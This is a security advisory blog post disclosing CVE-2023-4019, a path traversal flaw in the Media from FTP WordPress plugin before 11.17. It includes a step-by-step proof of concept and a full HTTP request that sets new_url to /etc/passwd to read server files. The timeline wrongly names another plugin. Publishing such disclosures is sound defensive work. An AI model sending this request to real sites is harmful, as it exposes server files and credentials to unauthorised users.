Site icon CleanTalk's blog

CVE-2023-4019 – Media from FTP < 11.17 - Author + Arbitrary File Access via Path Traversal

In a profound exploration of WordPress plugins, a chilling revelation has come to light. During meticulous testing, a high-impact vulnerability was unearthed within the Media from FTP plugin, specifically versions preceding 11.17. This alarming flaw exposes an avenue for attackers to exploit Path Traversal techniques, enabling unauthorized access to sensitive files and documents. The plugin does not properly limit who can use the plugin, which may allow users with author+ privileges to move files around, like wp-config.php, which may lead to RCE in some cases.

Main info:

CVECVE-2023-4019
PluginMedia from FTP
CriticalHigh
Publicly PublishedAugust 14, 2023
Last UpdatedAugust 14, 2023
ResearcherDmtirii Ignatyev
OWASP TOP-10A5: Broken Access Control
PoCYes
ExploitWill be later
Reference https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-4019
https://wpscan.com/vulnerability/0d323b07-c6e7-4aba-85bc-64659ad0c85d
Plugin Security Certification by CleanTalk

Timeline

July 26, 2023Plugin testing and vulnerability detection in the Advanced File Manager plugin have been completed
July 26, 2023I contacted the author of the plugin and provided a vulnerability PoC with a description and recommendations for fixing
July 31, 2023The author has released a fix update
August 14, 2023Registered CVE-2023-4019

Discovery of the Vulnerability

During testing of the plugin, a vulnerability was discovered in the mediafromftp-update-ajax-action, which allows downloading local folders outside of /var/www/html, which gives attackers a huge potential. They can download any local files in the media and then view them for example /etc/passwd, /etc/hosts and other local files/documents. This is possible on behalf of a user with Author rights. By default, the Author is not authorized to view local files and it cannot interact with them directly, viewing local files is very critical for the application owner. To eliminate this vulnerability, I ask you to validate the path that the user enters and if it does not contain a root directory, then do forbidden

Understanding of Path Traversal attack’s

Path Traversal, a notorious hacking technique, is at the core of this vulnerability. It involves manipulating file paths to breach directory boundaries and access files beyond the intended scope. Malicious actors exploit this to access files and directories that are otherwise restricted. Path Traversal OWASP TOP-10

Exploiting the Path Traversal vulnerability

Exploiting the CVE-2023-4019 vulnerability empowers attackers to venture outside the restricted directory of /var/www/html. This enables them to download local files, even those residing in sensitive system directories.

POC:

1) Go to /wordpress/wp-admin/admin.php?page=mediafromftp-search-register

2) Select any file from the media text list below

3) Click “Update Media”

4) Intercept request with action=mediafromftp-update-ajax-action

5) Сhange new_url to local dir like /etc/passwd or /etc/hosts

POC request:

POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1

Host: your_host

User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0

Accept: */*

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://127.0.0.1/wordpress/wp-admin/admin.php?page=mediafromftp-search-register

Content-Type: application/x-www-form-urlencoded; charset=UTF-8

X-Requested-With: XMLHttpRequest

Content-Length: 123

Origin: http://your_host

DNT: 1

Connection: close

Cookie: wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7Cb8692eb78cc5aa5fb9911291a78d34a0e04461ed834d1ca96b121cf1ef714aff; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=1%7C1690606171%7CfCvhmGhE1pXZ9e5sGp38GZd5KqlrcKsCvkhWuFVd7g9%7C1fe25db056c3038ca9accd05f2608008d9db007ec3d7b37572208454e3f62357; wp-settings-time-2=1690433465

Sec-Fetch-Dest: empty

Sec-Fetch-Mode: cors

Sec-Fetch-Site: same-origin

action=mediafromftp-update-ajax-action&nonce=9c0c0115ee&maxcount=1&new_url=/etc/passwd&new_datetime=2023-07-10+20%3A53%3A36

Potential Risks and Real-World Impact

The Path Traversal vulnerability within the Media from FTP plugin introduces grave risks and potential scenarios:

  1. Data Exposure:
    Attackers can access and potentially download sensitive files containing confidential information, jeopardizing data privacy and integrity.
  2. Malicious Use of Stolen Data:
    Extracted data from unauthorized file access could be used maliciously, undermining the integrity of the entire system.
  3. System Disruption:
    Access to sensitive files could lead to unintended modifications, potentially disrupting the functioning of the WordPress installation.

Recommendations for Improved Security

Safeguard your WordPress environment against CVE-2023-4019 and fortify your digital stronghold:

Empower the WordPress community with the knowledge of CVE-2023-4019. Share this article far and wide to ensure website owners take proactive measures against this critical vulnerability.

#WordPressSecurity #PathTraversalVulnerability #WebsiteSafety #StayProtected

Use CleanTalk solutions to improve the security of your website

Dmitrii i.

If you think your website is infected and you need help, contact us for malware cleanup. Our specialists will provide you with professional assistance in cleaning your website from malware.


Check my website

CVE-2023-4019 – Media from FTP < 11.17 - Author + Arbitrary File Access via Path Traversal
Exit mobile version